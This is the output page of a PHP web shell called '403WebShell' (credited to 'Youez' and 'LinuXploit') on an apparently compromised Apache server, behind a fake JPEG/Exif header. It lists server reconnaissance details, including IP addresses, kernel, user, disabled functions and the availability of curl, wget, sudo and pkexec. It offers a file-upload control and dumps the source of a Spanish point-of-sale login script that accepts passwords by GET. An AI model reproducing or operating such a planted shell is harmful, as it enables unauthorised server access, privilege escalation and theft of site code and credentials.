403WebShell

��JFIF��H�H��Exif��MM�*�� 3��V��3��3�(��3��403WebShell403Webshell

Server IP : 74.208.127.88 / Your IP : 216.73.216.83
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON
Directory : /var/www/html/muebles/application/debtcollector/ios/

Upload File :

[ Back ]

Current File : /var/www/html/muebles/application/debtcollector/ios//authorization.php

<?php

//if( !empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest' ){

    session_start();
    include "../../../library/config.php";
    require_once("../../model/dbconn.php");
    require_once("../../model/pos.php");

    // Obtener los datos de entrada (pueden ser GET o POST)
    if (isset($_GET['username'])) {
        $username = $_GET['username'];
        $password = $_GET['password'];
    } else {
        $username = $_POST['username'];
        $password = $_POST['password'];
    }

    // Validar si los campos están vacíos
    if (empty($username) && empty($password)) {
        echo json_encode(['status' => 'error', 'message' => 'Campos de usuario y password vacios.']);
        exit;
    }
    if (empty($username)) {
        echo json_encode(['status' => 'error', 'message' => 'El nombre de usuario esta vacio.']);
        exit;
    }
    if (empty($password)) {
        echo json_encode(['status' => 'error', 'message' => 'El password está vacio.']);
        exit;
    }

    $sv = new pos();

    // Obtener los datos del usuario (verificar usuario y contraseña)
    $data = $sv->getLogin($username, $password);

    // Verificar si el login es correcto
    if ($data[2] == 1) {
        // Si la autenticación es exitosa, crear las sesiones
        $_SESSION['pos_id'] = $data[1]['id_user'];
        $_SESSION['pos_h_menu'] = $data[1]['h_menu'];
        $_SESSION['pos_uniqid'] = uniqid();
        $_SESSION['name_shop'] = $data[1]['name_shop'];
        $_SESSION['pos_username'] = $username;
        $_SESSION['stock_id'] = $data[1]['stock_id'];
        $_SESSION['employee_id'] = $data[1]['employee_id'];

        // Limpiar cualquier venta temporal para este usuario
        $sv->deleteTempSaleByUser($_SESSION['pos_id']);

		 // Responder con un JSON de éxito y los datos de sesión
        $response = [
            'status' => 'success',
            'message' => 'Autenticacion exitosa.',
            'session_data' => [
                'pos_id' => $_SESSION['pos_id'],
                'pos_h_menu' => $_SESSION['pos_h_menu'],
                'pos_uniqid' => $_SESSION['pos_uniqid'],
                'name_shop' => $_SESSION['name_shop'],
                'pos_username' => $_SESSION['pos_username'],
                'stock_id' => $_SESSION['stock_id'],
                'id_collector' => $_SESSION['employee_id']
            ],
            'redirect_url' => '../main/index.php' // URL para redirigir tras un login exitoso
        ];

        echo json_encode($response);
		
    } else {
        // Si la autenticación falla
        echo json_encode([
            'status' => 'error',
            'message' => 'Credenciales incorrectas.',
            'error_code' => 4
        ]);
    }
	
/*	
} else {
    // Si no es una solicitud AJAX
    echo json_encode([
        'status' => 'error',
        'message' => 'Acceso no autorizado. Solicitud no es AJAX.'
    ]);
}*/
?>

Youez - 2016 - github.com/yon3zu
LinuXploit